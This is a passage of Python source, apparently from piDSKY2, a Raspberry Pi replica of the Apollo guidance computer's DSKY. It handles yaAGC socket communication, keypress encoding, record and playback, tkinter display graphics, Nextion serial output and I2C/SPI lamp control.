#print("Home = " + homeDir)
# Parse command-line arguments.
cli = argparse.ArgumentParser()
cli.add_argument("--host", help="Host address of yaAGC, defaulting to localhost.")
cli.add_argument("--port", help="Port for yaAGC, defaulting to 19798.", type=int)
cli.add_argument("--window", help="Use window rather than full screen for LCD.")
cli.add_argument("--slow", help="For use on really slow host systems.")
cli.add_argument("--pigpio", help="Use PIGPIO rather than led-panel for lamp control. The value is a brightness-intensity setting, 0-15.", type=int)
cli.add_argument("--record", help="Record all incoming i/o-channel data for later playback.")
cli.add_argument("--playback", help="Play back recorded i/o-channel data from selected filename.")
cli.add_argument("--lamptest", help="Perform a lamp test and then exit.")
cli.add_argument("--manual", help="Manually control the display.")
cli.add_argument("--gunmetal", help="Use gunmetal versions of mounting posts and horizontal separator.")
cli.add_argument("--backlights", help="Turn on key backlights at startup.")
args = cli.parse_args()
if args.backlights:
useBacklights = True
else:
useBacklights = False
initDisplay()
if args.manual:
os.system('clear')
print("Manual DSKY Instructions")
print("------------------------")
print("Area-selection mode:")
print(" RSET to exit.")
print(" PRO to select PROG area.")
print(" VERB to select VERB area.")
print(" NOUN to select NOUN area.")
print(" 1/2/3 to select R1/R2/R3.")
print(" + to select lamps.")
print(" - to select key-backlights.")
print(" CLR to toggle COMP ACTY.")
print("In numerical-entry mode (after choosing")
print("PRO, VERB, NOUN, 1, 2, or 3 in area-")
print("selection mode), use these keys:")
print(" +-0123456789 as usual for numbers")
print(" CLR for blank spaces")
print(" KEY REL to backspace")
print(" ENTR returns to area selection")
print(" RSET screenshot")
print(" PRO/VERB/NOUN also switch areas")
print("For lamp-editing mode, the 14 lamps are")
print("ordered ROW-WISE starting from the")
print("upper left to the lower right. For")
print("key-backlight mode, the keys are")
print("ordered COLUMN-WISE from upper left to")
print("lower right (19 total), plus 3 hidden")
print("lamps: VNC, TBD1, and TBD2. In either")
print("case, use these keys in these modes:")
print(" +- for ON and OFF")
print(" KEY REL to backspace")
print(" ENTR returns to area selection")
print(" RSET screenshot")
print(" PRO/VERB/NOUN also switch areas")
input("Hit ENTR to start ... ")
# Responsiveness settings.
if args.slow:
PULSE = 0.25
lampDeadtime = 0.25
else:
PULSE = 0.05
lampDeadtime = 0.1
# Characteristics of the host and port being used for yaAGC communications.
if args.host:
TCP_IP = args.host
else:
TCP_IP = 'localhost'
if args.port:
TCP_PORT = args.port
else:
TCP_PORT = 19798
if args.record:
lastRecordedTime = -1
recordingFile = open(homeDir + "/Desktop/piDSKY2-recorded.canned", "w", 1)
if args.playback:
useBacklights = False
lastPlaybackTime = time.time()
playbackEvents = []
currentPlaybackIndex = 0
try:
playbackFile = open(args.playback, "r")
playbackGenerator = (line.strip().split() for line in playbackFile)
# Loop on the input-file's lines.
for line in playbackGenerator:
# If we find a field that begins with the '#' character,
# we ignore all of the fields beyond it as constituting
# a comment.
for i in range(1, len(line)):
if line[i][:1] == '#':
line = line[:i]
break
# At minimum, we require there must be at least 2 fields in
# the line, that the first must be a float, and the
# second must not be empty.
if len(line) < 2 or len(line[1]) < 1:
continue
try:
differential = float(line[0])
except:
continue
# There are two cases at this
# point. First, the line could be an i/o-channel event, in
# which case it has 3 fields consisting of a float (already
# verified) and two octals. In the second, it consists of
# a variable number of fields, of which the first is a float
# (already verified), the second is non-empty (and consists
# of the name of a program to be run), and the remainder (if
# any) are the command-line parameters for that program.
# When we append this to the event array, we distinguish by adding
# an extra field that is either True for the former case or
# False for the latter.
entry = ()
if len(line) == 3:
try:
entry = ( True, differential, int(line[1], 8), int(line[2], 8) )
except:
pass
if len(entry) == 0:
command = line[1];
for i in range(2, len(line)):
command += " " + line[i]
entry = ( False, differential, command )
playbackEvents.append( entry )
#print(str(playbackEvents[len(playbackEvents)-1]))
except:
print("Problem with playback file: " + args.playback)
time.sleep(2)
echoOn(True)
os._exit(1)
# Set up root viewport for tkinter graphics
root = Tk()
if args.window:
root.geometry('272x480+0+0')
root.title("piDSKY2")
else:
root.attributes('-fullscreen', True)
root.config(cursor="none")
root.configure(background='black')
# Preload images to make it go faster later.
imageDigitBlank = PhotoImage(file="piDSKY2-images/7Seg-0.gif")
imageDigit0 = PhotoImage(file="piDSKY2-images/7Seg-21.gif")
imageDigit1 = PhotoImage(file="piDSKY2-images/7Seg-3.gif")
imageDigit2 = PhotoImage(file="piDSKY2-images/7Seg-25.gif")
imageDigit3 = PhotoImage(file="piDSKY2-images/7Seg-27.gif")
imageDigit4 = PhotoImage(file="piDSKY2-images/7Seg-15.gif")
imageDigit5 = PhotoImage(file="piDSKY2-images/7Seg-30.gif")
imageDigit6 = PhotoImage(file="piDSKY2-images/7Seg-28.gif")
imageDigit7 = PhotoImage(file="piDSKY2-images/7Seg-19.gif")
imageDigit8 = PhotoImage(file="piDSKY2-images/7Seg-29.gif")
imageDigit9 = PhotoImage(file="piDSKY2-images/7Seg-31.gif")
imageCompActyOff = PhotoImage(file="piDSKY2-images/CompActyOff.gif")
imageCompActyOn = PhotoImage(file="piDSKY2-images/CompActyOn.gif")
imageMinusOn = PhotoImage(file="piDSKY2-images/MinusOn.gif")
imagePlusOn = PhotoImage(file="piDSKY2-images/PlusOn.gif")
imagePlusMinusOff = PhotoImage(file="piDSKY2-images/PlusMinusOff.gif")
imageProgOn = PhotoImage(file="piDSKY2-images/ProgOn.gif")
imageVerbOn = PhotoImage(file="piDSKY2-images/VerbOn.gif")
imageNounOn = PhotoImage(file="piDSKY2-images/NounOn.gif")
if args.gunmetal:
imageSeparatorOn = PhotoImage(file="piDSKY2-images/SeparatorOn.gif")
imageSeparatorOff = PhotoImage(file="piDSKY2-images/SeparatorOn.gif")
imageDot = PhotoImage(file="piDSKY2-images/Dot.gif")
else:
imageSeparatorOn = PhotoImage(file="piDSKY2-images/SeparatorOn-gunmetal.gif")
imageSeparatorOff = PhotoImage(file="piDSKY2-images/SeparatorOff-gunmetal.gif")
imageDot = PhotoImage(file="piDSKY2-images/Dot-gunmetal.gif")
# Initial placement of all graphical objects on LCD panel.
widgetStates = {}
widgetLabels = {}
def displayGraphic(x, y, img):
global widgetStates, widgetLabels
hmiObj = ''
hmiValue = ''
#convert x,y coordinates into corresponding object names from the HMI file (Vlad Mihailescu)
if x == 172 and y == 36: hmiObj = 'p0'
elif x == 222 and y == 36: hmiObj = 'p1'
elif x == 0 and y == 149: hmiObj = 'v0'
elif x == 50 and y == 149: hmiObj = 'v1'
elif x == 172 and y == 149: hmiObj = 'n0'
elif x == 222 and y == 149: hmiObj = 'n1'
elif x == 0 and y == 238: hmiObj = 'r10'
elif x == 22 and y == 238: hmiObj = 'r11'
elif x == 72 and y == 238: hmiObj = 'r12'
elif x == 122 and y == 238: hmiObj = 'r13'
elif x == 172 and y == 238: hmiObj = 'r14'
elif x == 222 and y == 238: hmiObj = 'r15'
elif x == 0 and y == 328: hmiObj = 'r20'
elif x == 22 and y == 328: hmiObj = 'r21'
elif x == 72 and y == 328: hmiObj = 'r22'
elif x == 122 and y == 328: hmiObj = 'r23'
elif x == 172 and y == 328: hmiObj = 'r24'
elif x == 222 and y == 328: hmiObj = 'r25'
elif x == 0 and y == 418: hmiObj = 'r30'
elif x == 22 and y == 418: hmiObj = 'r31'
elif x == 72 and y == 418: hmiObj = 'r32'
elif x == 122 and y == 418: hmiObj = 'r33'
elif x == 172 and y == 418: hmiObj = 'r34'
elif x == 222 and y == 418: hmiObj = 'r35'
elif x == 0 and y == 212: hmiObj = 'l1'
elif x == 0 and y == 302: hmiObj = 'l2'
elif x == 0 and y == 392: hmiObj = 'l3'
#convert corresponding image files into values to be displayed on the HMI (Vlad Mihailescu)
if img == imageDigit0: hmiValue = '"0"'
elif img == imageDigit1: hmiValue = '"1"'
elif img == imageDigit2: hmiValue = '"2"'
elif img == imageDigit3: hmiValue = '"3"'
elif img == imageDigit4: hmiValue = '"4"'
elif img == imageDigit5: hmiValue = '"5"'
elif img == imageDigit6: hmiValue = '"6"'
elif img == imageDigit7: hmiValue = '"7"'
elif img == imageDigit8: hmiValue = '"8"'
elif img == imageDigit9: hmiValue = '"9"'
elif img == imageDigitBlank: hmiValue = '""'
elif img == imageMinusOn: hmiValue = '"-"'
elif img == imagePlusOn: hmiValue = '"+"'
elif img == imagePlusMinusOff: hmiValue = '""'
elif img == imageSeparatorOff: hmiValue = '""'
elif img == imageSeparatorOn: hmiValue = '24544'
key = str(x) + "," + str(y)
if key in widgetStates:
if widgetStates[key] is img:
#print("skipping " + key)
return
widgetStates[key] = img
if key in widgetLabels:
widgetLabels[key].destroy()
widgetLabels[key] = Label(root, image=img, borderwidth=0, highlightthickness=0)
widgetLabels[key].place(x=x, y=y)
#write serial bytes to Nextion HMI encoded in iso-8859-1 aka latin_1 (Vlad Mihailescu)
if img == imageCompActyOn: ser_disp.write(b'cal.bco=' + turnON + eof)
elif img == imageCompActyOff: ser_disp.write(b'cal.bco=' + turnOFF + eof)
elif img == imageSeparatorOn: ser_disp.write((hmiObj + '.pco=' + hmiValue + '\xff\xff\xff').encode('latin_1'))
elif img == imageSeparatorOff: ser_disp.write((hmiObj + '.pco=33808\xff\xff\xff').encode('latin_1'))
elif x == 0 and y == 212 and img == imageSeparatorOff: ser_disp.write(('l1.pco=23243\xff\xff\xff').encode('latin_1'))
else: ser_disp.write((hmiObj + '.txt=' + hmiValue + '\xff\xff\xff').encode('latin_1'))
ser_disp.flush()
topDot = 15
dotSpacing = 92
topProg = 36
topVN = 149
topR1 = 238
topR2 = 328
topR3 = 418
signWidth = 22
digitWidth = 50
colSign = 0
colDot = 133
colPN = 172
colD1 = colSign + signWidth
colD2 = colD1 + digitWidth
colD3 = colD2 + digitWidth
colD4 = colD3 + digitWidth
colD5 = colD4 + digitWidth
displayGraphic(colDot, topDot, imageDot)
displayGraphic(colDot, topDot + dotSpacing, imageDot)
displayGraphic(colDot, topDot + 2 * dotSpacing, imageDot)
displayGraphic(colPN, 0, imageProgOn)
displayGraphic(0, 113, imageVerbOn)
displayGraphic(colPN, 113, imageNounOn)
displayGraphic(0, 212, imageSeparatorOn)
displayGraphic(0, 302, imageSeparatorOff)
displayGraphic(0, 392, imageSeparatorOff)
###################################################################################################
# Stuff related to control of the lamp board via PIGPIO and I2C on the Pi's GPIO (Vlad Mihailescu)
import smbus
# Initialize the PIGPIO API.
DEVICE_BUS = 1
DEVICE_ADDR = 0x11
bus = smbus.SMBus(DEVICE_BUS)
def StringToBytes(val):
retVal = []
for c in val:
retVal.append(ord(c))
return retVal
# Writes to a register of the LED driver chip via the I2C bus.
def writeI2c(value):
bus.write_byte(DEVICE_ADDR,value)
def writeI2cByte(value):
byteVal = StringToBytes(value)
bus.write_i2c_block_data(DEVICE_ADDR,0x00,byteVal)
return -1
###################################################################################
# Stuff related to control of the lamp board via PIGPIO and SPI on the Pi's GPIO.
# Initialize the PIGPIO API. Note that LED-driver chip we're going to
# interface to has a 10 Mbaud SPI bus, and the PIGPIO docs indicate that
# the SPI bus probably won't work above 30 Mbaud, so 10 Mbaud is probably
# okay. I arbitrarily cut this down to 100K, but an optimal setting should
# perhaps be determined empirically.
gpio = ""
spiHandle = -1
spiChannel = 0
spiBaud = 100000
spiErrorMessageWaitTime = 3
# Writes to a register of the LED driver chip via the SPI bus. The
# register address is 0..15, and the value is 0..255.
def writeSpi(address, value):
global gpio, spiHandle
gpio.spi_write(spiHandle, [ address, value ])
def shutdownGPIO():
if args.pigpio:
global spiHandle, gpio
if spiHandle >= 0:
gpio.spi_close(spiHandle)
spiHandle = -1
if gpio != "":
gpio.stop()
gpio = ""
import atexit
atexit.register(shutdownGPIO)
if args.pigpio:
import pigpio
gpio = pigpio.pi()
if not gpio.connected:
sys.stderr.write("Cannot connect to PIGPIO server.\n")
time.sleep(spiErrorMessageWaitTime)
os.exit(1)
spiHandle = gpio.spi_open(spiChannel, spiBaud, 0x0000) # CE0, main SPI device, mode 0.
if spiHandle < 0:
sys.stderr.write("Cannot open SPI channel.\n")
time.sleep(spiErrorMessageWaitTime)
if gpio != "":
gpio.stop()
gpio = ""
os.exit(1)
# Set up the LED-driver chip.
for i in range(1, 9):
writeSpi(i, 0) # The initial settings of the "digits".
writeSpi(9, 0) # No BCD decoding.
writeSpi(10, int(args.pigpio)) # Brightness-PWM setting, 0..15.
writeSpi(11, 7) # All 8 digits are controlled.
writeSpi(12, 1) # Not in shut-down mode.
# Simply a test of the display and the code above,
# using the chip's display-test function.
if False:
print("SPI test ...")
for i in range(0, 10):
print("On " + str(i))
writeSpi(15, 1)
time.sleep(1)
print("Off " + str(i))
writeSpi(15, 0)
time.sleep(1)
print("SPI test completed.")
###################################################################################
# Some utilities I happen to use in my sample hardware abstraction functions, but
# not of value outside of that, unless you happen to be implementing DSKY functionality
# in a similar way.
# Given a 3-tuple (channel,value,mask), creates packet data and sends it to yaAGC.
def packetize(tuple):
if args.playback:
return
outputBuffer = bytearray(4)
# First, create and output the mask command.
outputBuffer[0] = 0x20 | ((tuple[0] >> 3) & 0x0F)
outputBuffer[1] = 0x40 | ((tuple[0] << 3) & 0x38) | ((tuple[2] >> 12) & 0x07)
outputBuffer[2] = 0x80 | ((tuple[2] >> 6) & 0x3F)
outputBuffer[3] = 0xC0 | (tuple[2] & 0x3F)
s.send(outputBuffer)
# Now, the actual data for the channel.
outputBuffer[0] = 0x00 | ((tuple[0] >> 3) & 0x0F)
outputBuffer[1] = 0x40 | ((tuple[0] << 3) & 0x38) | ((tuple[1] >> 12) & 0x07)
outputBuffer[2] = 0x80 | ((tuple[1] >> 6) & 0x3F)
outputBuffer[3] = 0xC0 | (tuple[1] & 0x3F)
s.send(outputBuffer)
if args.record:
global lastRecordedTime, recordingFile, lastInputChannels
currentTime = time.time()
if lastRecordedTime < 0:
lastRecordedTime = currentTime
try:
channelName = oct(tuple[0])
if not (channelName in lastInputChannels) or lastInputChannels[channelName] != tuple[1]:
lastInputChannels[channelName] = tuple[1]
recordingFile.write(str(round(1000 * (currentTime - lastRecordedTime)))
+ " " + ("%o" % tuple[0]) + " " + ("%o" % tuple[1]) + "\n")
lastRecordedTime = currentTime
except:
pass
lastRecordedTime = currentTime
# This particular function parses various keystrokes, like '0' or 'V' and creates
# packets as if they were DSKY keypresses. It should be called occasionally as
# parseDskyKey(0) if there are no keystrokes, in order to make sure that the PRO
# key gets released.
# The return value of this function is
# a list ([...]), of which each element is a 3-tuple consisting of an AGC channel
# number, a value for that channel, and a bitmask that tells which bit-positions
# of the value are valid. The returned list can be empty. For example, a
# return value of
# [ ( 0o15, 0o31, 0o37 ) ]
# would indicate that the lowest 5 bits of channel 15 (octal) were valid, and that
# the value of those bits were 11001 (binary), which collectively indicate that
# the KEY REL key on a DSKY is pressed.
resetCount = 0
# stateV35E and countV35E are some instrumentation for printing out a count of how
# many times V35E has been used. It is solely for debugging.
stateV35E = 0
countV35E = 0
def parseDskyKey(ch):
global resetCount
global stateV35E, countV35E
if ch == 'R':
resetCount += 1
if resetCount >= 5:
print("Exiting ...")
return ""
elif ch != "":
resetCount = 0
returnValue = []
relatedToV35E = False
if ch == '0':
returnValue.append( (0o15, 0o20, 0o37) )
elif ch == '1':
returnValue.append( (0o15, 0o1, 0o37) )
elif ch == '2':
returnValue.append( (0o15, 0o2, 0o37) )
elif ch == '3':
returnValue.append( (0o15, 0o3, 0o37) )
if stateV35E == 1:
relatedToV35E = True
stateV35E = 2
elif ch == '4':
returnValue.append( (0o15, 0o4, 0o37) )
elif ch == '5':
returnValue.append( (0o15, 0o5, 0o37) )
if stateV35E == 2:
relatedToV35E = True
stateV35E = 3
elif ch == '6':
returnValue.append( (0o15, 0o6, 0o37) )
elif ch == '7':
returnValue.append( (0o15, 0o7, 0o37) )
elif ch == '8':
returnValue.append( (0o15, 0o10, 0o37) )
elif ch == '9':
returnValue.append( (0o15, 0o11, 0o37) )
elif ch == '+':
returnValue.append( (0o15, 0o32, 0o37) )
elif ch == '-':
returnValue.append( (0o15, 0o33, 0o37) )
elif ch == 'V':
returnValue.append( (0o15, 0o21, 0o37) )
relatedToV35E = True
stateV35E = 1
elif ch == 'N':
returnValue.append( (0o15, 0o37, 0o37) )
elif ch == 'R':
returnValue.append( (0o15, 0o22, 0o37) )
elif ch == 'C':
returnValue.append( (0o15, 0o36, 0o37) )
elif ch == 'P':
returnValue.append( (0o32, 0o00000, 0o20000) )
elif ch == 'p' or ch == 'PR':
returnValue.append( (0o32, 0o20000, 0o20000) )
elif ch == 'K':
returnValue.append( (0o15, 0o31, 0o37) )
elif ch == '\n' or ch == 'E':
returnValue.append( (0o15, 0o34, 0o37) )
if stateV35E == 3:
countV35E += 1
sys.stderr.write("V35E count = " + str(countV35E) + "\n")
else:
relatedToV35E = True
if not relatedToV35E:
stateV35E = 0
return returnValue
# This function turns keyboard echo on or off.
def echoOn(control):
fd = sys.stdin.fileno()
new = termios.tcgetattr(fd)
if control:
print("Keyboard echo on")
new[3] |= termios.ECHO
else:
print("Keyboard echo off")
new[3] &= ~termios.ECHO
termios.tcsetattr(fd, termios.TCSANOW, new)
echoOn(False)
# Get a screenshot.
def screenshot(name):
global args
print("Creating screenshot ...")
img = grab(bbox=(0, 0, 272, 480))
img.save(name)
print("Screenshot saved as " + name);
# This function is a non-blocking read of a single character from the
# keyboard. Returns either the key value (such as '0' or 'V'), or else
# the value "" if no key was pressed.
def get_char_keyboard_nonblock():
fd = sys.stdin.fileno()
oldterm = termios.tcgetattr(fd)
newattr = termios.tcgetattr(fd)
newattr[3] = newattr[3] & ~termios.ICANON & ~termios.ECHO
termios.tcsetattr(fd, termios.TCSANOW, newattr)
oldflags = fcntl.fcntl(fd, fcntl.F_GETFL)
fcntl.fcntl(fd, fcntl.F_SETFL, oldflags | os.O_NONBLOCK)
c = ""
try:
c = sys.stdin.read(1)
except IOError: pass
termios.tcsetattr(fd, termios.TCSAFLUSH, oldterm)
fcntl.fcntl(fd, fcntl.F_SETFL, oldflags)
return c
###################################################################################
# Hardware abstraction / User-defined functions. Also, any other platform-specific
# initialization.
# This function is automatically called periodically by the event loop to check for
# conditions that will result in sending messages to yaAGC that are interpreted
# as changes to bits on its input channels. For test purposes, it simply polls the
# keyboard, and interprets various keystrokes as DSKY keys if present. The return
# value is supposed to be a list of 3-tuples of the form
# [ (channel0,value0,mask0), (channel1,value1,mask1), ...]
# and may be en empty list. The list guiKey is used to queue up keypresses (or
# relevant key releases) from the graphics window, so that they can be properly
# merged in with keystrokes from the console, without losing any of them.
guiKey = []
def getKey():
global guiKey
if len(guiKey) == 0:
ch = get_char_keyboard_nonblock()
else:
ch = guiKey.pop(0)
ch = ch.upper()
if ch == '_':
ch = '-'
elif ch == '=':
ch = '+'
return ch
def inputsForAGC():
returnValue = parseDskyKey(getKey())
if len(returnValue) > 0:
print("Sending to yaAGC: " + oct(returnValue[0][1]) + "(mask " + oct(returnValue[0][2]) + ") -> channel " + oct(returnValue[0][0]))
return returnValue
# Capture any keypress events from the LCD window.
# Many need to be translated for shifting, or due to being
# from the numeric keypad.
guiKeyTranslations = []
guiKeyTranslations.append(("Return", "\n"))
guiKeyTranslations.append(("KP_Enter", "\n"))
guiKeyTranslations.append(("equal", "+"))
guiKeyTranslations.append(("plus", "+"))
guiKeyTranslations.append(("KP_Add", "+"))
guiKeyTranslations.append(("minus", "-"))
guiKeyTranslations.append(("underscore", "-"))
guiKeyTranslations.append(("KP_Subtract", "-"))
guiKeyTranslations.append(("slash", "V"))
guiKeyTranslations.append(("KP_Divide", "V"))
guiKeyTranslations.append(("asterisk", "N"))
guiKeyTranslations.append(("KP_Multiply", "N"))
guiKeyTranslations.append(("Delete", "C"))
guiKeyTranslations.append(("KP_Decimal", "C"))
guiKeyTranslations.append(("KP_Delete", "C"))
guiKeyTranslations.append(("BackSpace", "P"))
guiKeyTranslations.append(("KP_0", "0"))
guiKeyTranslations.append(("KP_Insert", "0"))
guiKeyTranslations.append(("KP_1", "1"))
guiKeyTranslations.append(("KP_End", "1"))
guiKeyTranslations.append(("KP_2", "2"))
guiKeyTranslations.append(("KP_Down", "2"))
guiKeyTranslations.append(("KP_3", "3"))
guiKeyTranslations.append(("KP_Next", "3"))
guiKeyTranslations.append(("KP_4", "4"))
guiKeyTranslations.append(("KP_Left", "4"))
guiKeyTranslations.append(("KP_5", "5"))
guiKeyTranslations.append(("KP_Begin", "5"))
guiKeyTranslations.append(("KP_6", "6"))
guiKeyTranslations.append(("KP_Right", "6"))
guiKeyTranslations.append(("KP_7", "7"))
guiKeyTranslations.append(("KP_Home", "7"))
guiKeyTranslations.append(("KP_8", "8"))
guiKeyTranslations.append(("KP_Up", "8"))
guiKeyTranslations.append(("KP_9", "9"))
guiKeyTranslations.append(("KP_Prio", "9"))
debugKey = ""
def guiKeypress(event):
global guiKey, debugKey, guiKeyTranslations
if event.keysym == "Num_Lock":
# Pressing the NUM LOCK key turns key-repeat back on.
# So let's undo that.
os.system("xset r off &")
debugKey = event.keysym
for i in range(0, len(guiKeyTranslations)):
if debugKey == guiKeyTranslations[i][0]:
guiKey.append(guiKeyTranslations[i][1])
return
guiKey.append(debugKey)
def guiKeyrelease(event):
global guiKey
if event.keysym == 'p' or event.keysym == 'P' or event.keysym == "BackSpace":
guiKey.append("PR")
root.bind_all('<KeyPress>', guiKeypress)
root.bind_all('<KeyRelease>', guiKeyrelease)
# The tab key isn't captured by the stuff above.
def tabKeypress(event):
global guiKey, debugKey
debugKey = "Tab"
guiKey.append("K")
root.bind_all('<Tab>', tabKeypress)
os.system("xset r off &")
# Converts a 5-bit code in channel 010 to " ", "0", ..., "9".
def codeToString(code):
if code == 0:
return " ", imageDigitBlank
elif code == 21:
return "0", imageDigit0
elif code == 3:
return "1", imageDigit1
elif code == 25:
return "2", imageDigit2
elif code == 27:
return "3", imageDigit3
elif code == 15:
return "4", imageDigit4
elif code == 30:
return "5", imageDigit5
elif code == 28:
return "6", imageDigit6
elif code == 19:
return "7", imageDigit7
elif code == 29:
return "8", imageDigit8
elif code == 31:
return "9", imageDigit9
return "?", imageDigitBlank
def displaySign(x, y, state):
if state == 1:
displayGraphic(x, y, imagePlusOn)
elif state == 2:
displayGraphic(x, y, imageMinusOn)
else:
displayGraphic(x, y, imagePlusMinusOff)
# For flashing verb/noun area.
vnFlashing = False
vnTimer = ""
vnCurrentlyOn = True
vnImage1 = imageDigitBlank
vnImage2 = imageDigitBlank
vnImage3 = imageDigitBlank
vnImage4 = imageDigitBlank
def vnFlashingHandler():
global vnFlashing, vnTimer, vnCurrentlyOn, vnImage1, vnImage2, vnImage3, vnImage4
if vnFlashing:
vnCurrentlyOn = not vnCurrentlyOn
if vnCurrentlyOn:
displayGraphic(0, topVN, vnImage1)
displayGraphic(digitWidth, topVN, vnImage2)
displayGraphic(colPN, topVN, vnImage3)
displayGraphic(colPN + digitWidth, topVN, vnImage4)
#Nextion VERB, NOUN digits flash on (Vlad Mihailescu)
ser_disp.write(b'v0.pco=' + turnON + eof)
ser_disp.write(b'v1.pco=' + turnON + eof)
ser_disp.write(b'n0.pco=' + turnON + eof)
ser_disp.write(b'n1.pco=' + turnON + eof)
else:
displayGraphic(0, topVN, imageDigitBlank)
displayGraphic(digitWidth, topVN, imageDigitBlank)
displayGraphic(colPN, topVN, imageDigitBlank)
displayGraphic(colPN + digitWidth, topVN, imageDigitBlank)
#Nextion VERB, NOUN digits flash off (Vlad Mihailescu)
ser_disp.write(b'v0.pco=' + turnOFF + eof)
ser_disp.write(b'v1.pco=' + turnOFF + eof)
ser_disp.write(b'n0.pco=' + turnOFF + eof)
ser_disp.write(b'n1.pco=' + turnOFF + eof)
vnTimer = threading.Timer(0.75, vnFlashingHandler)
vnTimer.start()
def vnFlashingStop():
global vnFlashing, vnTimer, vnCurrentlyOn, vnImage1, vnImage2, vnImage3, vnImage4
if vnFlashing:
vnTimer.cancel()
displayGraphic(0, topVN, vnImage1)
displayGraphic(digitWidth, topVN, vnImage2)
displayGraphic(colPN, topVN, vnImage3)
displayGraphic(colPN + digitWidth, topVN, vnImage4)
#Nextion VERB, NOUN digits flash off (Vlad Mihailescu)
ser_disp.write(b'v0.pco=' + turnON + eof)
ser_disp.write(b'v1.pco=' + turnON + eof)
ser_disp.write(b'n0.pco=' + turnON + eof)
ser_disp.write(b'n1.pco=' + turnON + eof)
vnFlashing = False
# The following dictionary gives, for each controllable lighting element (indicator lamps
# and key backlights mostly):
# Whether or not it is currently lit.
# Command-line parameters for the shell function 'led-panel' to turn on that lamp.
# A list of registers and bit-masks (for the registers) for an LED-driver chip
# connected to the Pi via the I2C bus for turning that lamp.
# The hardware assumption is that there is a MAX7219 7-segment LED controller chip,
# which is a device that controls 8 7-segment(+decimal point) displays, thus
# controlling 64 individual LEDs. These are arranged as "DIGIT0" through "DIGIT1",
# controlled by chip registers 1 through 8. Within an individual chip register,
# the display segments are (from MSB to LSB)
# DP a b c d e f g
# Thus to indicate which LEDs a given lighting element is associated with, we only
# have to list the chip registers and bit masks within the register those lighting
# elements are associated with. Both these chip parameters and command-line parameters
# for the external program 'led-panel' are given. Which of the two sets of parameters
# ends up being used is dependendent on the --pigpio command-line parameter.
lampStatuses = {
"UPLINK ACTY" : { "isLit" : False, "cliParameter" : "3", "spiParameters" : [ { "register":1, "mask":0x70 } ] },
"TEMP" : { "isLit" : False, "cliParameter" : "2", "spiParameters" : [ { "register":1, "mask":0x07 } ] },
"NO ATT" : { "isLit" : False, "cliParameter" : "5", "spiParameters" : [ { "register":2, "mask":0x70 } ] },
"GIMBAL LOCK" : { "isLit" : False, "cliParameter" : "4", "spiParameters" : [ { "register":2, "mask":0x07 } ] },
"DSKY STANDBY" : { "isLit" : False, "cliParameter" : "7", "spiParameters" : [ { "register":3, "mask":0x70 } ] },
"PROG" : { "isLit" : False, "cliParameter" : "6", "spiParameters" : [ { "register":3, "mask":0x07 } ] },
"KEY REL" : { "isLit" : False, "cliParameter" : "B", "spiParameters" : [ { "register":4, "mask":0x70 } ] },
"RESTART" : { "isLit" : False, "cliParameter" : "8", "spiParameters" : [ { "register":4, "mask":0x07 } ] },
"OPR ERR" : { "isLit" : False, "cliParameter" : "9", "spiParameters" : [ { "register":5, "mask":0x70 } ] },
"TRACKER" : { "isLit" : False, "cliParameter" : "A", "spiParameters" : [ { "register":5, "mask":0x07 } ] },
"PRIO DSP" : { "isLit" : False, "cliParameter" : "D", "spiParameters" : [ { "register":6, "mask":0x70 } ] },
"ALT" : { "isLit" : False, "cliParameter" : "C", "spiParameters" : [ { "register":6, "mask":0x07 } ] },
"NO DAP" : { "isLit" : False, "cliParameter" : "F", "spiParameters" : [ { "register":7, "mask":0x70 } ] },
"VEL" : { "isLit" : False, "cliParameter" : "E", "spiParameters" : [ { "register":7, "mask":0x07 } ] },
"VERB KEY" : { "isLit" : useBacklights, "cliParameter" : "G", "spiParameters" : [ { "register":1, "mask":0x08 } ] },
"NOUN KEY" : { "isLit" : useBacklights, "cliParameter" : "H", "spiParameters" : [ { "register":1, "mask":0x80 } ] },
"+ KEY" : { "isLit" : useBacklights, "cliParameter" : "I", "spiParameters" : [ { "register":2, "mask":0x08 } ] },
"- KEY" : { "isLit" : useBacklights, "cliParameter" : "J", "spiParameters" : [ { "register":2, "mask":0x80 } ] },
"0 KEY" : { "isLit" : useBacklights, "cliParameter" : "K", "spiParameters" : [ { "register":3, "mask":0x08 } ] },
"7 KEY" : { "isLit" : useBacklights, "cliParameter" : "L", "spiParameters" : [ { "register":3, "mask":0x80 } ] },
"4 KEY" : { "isLit" : useBacklights, "cliParameter" : "M", "spiParameters" : [ { "register":4, "mask":0x08 } ] },
"1 KEY" : { "isLit" : useBacklights, "cliParameter" : "N", "spiParameters" : [ { "register":4, "mask":0x80 } ] },
"8 KEY" : { "isLit" : useBacklights, "cliParameter" : "O", "spiParameters" : [ { "register":5, "mask":0x08 } ] },
"5 KEY" : { "isLit" : useBacklights, "cliParameter" : "P", "spiParameters" : [ { "register":5, "mask":0x80 } ] },
"2 KEY" : { "isLit" : useBacklights, "cliParameter" : "Q", "spiParameters" : [ { "register":6, "mask":0x08 } ] },
"9 KEY" : { "isLit" : useBacklights, "cliParameter" : "R", "spiParameters" : [ { "register":6, "mask":0x80 } ] },
"6 KEY" : { "isLit" : useBacklights, "cliParameter" : "S", "spiParameters" : [ { "register":7, "mask":0x08 } ] },
"3 KEY" : { "isLit" : useBacklights, "cliParameter" : "T", "spiParameters" : [ { "register":7, "mask":0x80 } ] },
"CLR KEY" : { "isLit" : useBacklights, "cliParameter" : "U", "spiParameters" : [ { "register":8, "mask":0x40 } ] },
"PRO KEY" : { "isLit" : useBacklights, "cliParameter" : "V", "spiParameters" : [ { "register":8, "mask":0x20 } ] },
"KEY REL KEY" : { "isLit" : useBacklights, "cliParameter" : "W", "spiParameters" : [ { "register":8, "mask":0x10 } ] },
"ENTR KEY" : { "isLit" : useBacklights, "cliParameter" : "X", "spiParameters" : [ { "register":8, "mask":0x08 } ] },
"RSET KEY" : { "isLit" : useBacklights, "cliParameter" : "Y", "spiParameters" : [ { "register":8, "mask":0x04 } ] },
"VNCSERVERUI" : { "isLit" : False, "cliParameter" : "Z", "spiParameters" : [ { "register":8, "mask":0x02 } ] },
"TBD1" : { "isLit" : False, "cliParameter" : "a", "spiParameters" : [ { "register":8, "mask":0x01 } ] },
"TBD2" : { "isLit" : False, "cliParameter" : "b", "spiParameters" : [ { "register":8, "mask":0x80 } ] }
}
#lampCliStringDefault = "GHIJKLMNOPQRSTUVWXY"
lampCliStringDefault = ""
lampCliByte = b""
lastLampCliString = ""
def updateLampStatuses(key, value):
global lampStatuses
if key in lampStatuses:
lampStatuses[key]["isLit"] = value
def flushLampUpdates(lampCliString):
global lastLampCliString
lastLampCliString = lampCliString
os.system("sudo ./led-panel '" + lampCliString + "' &")
lampExecCheckCount = 0
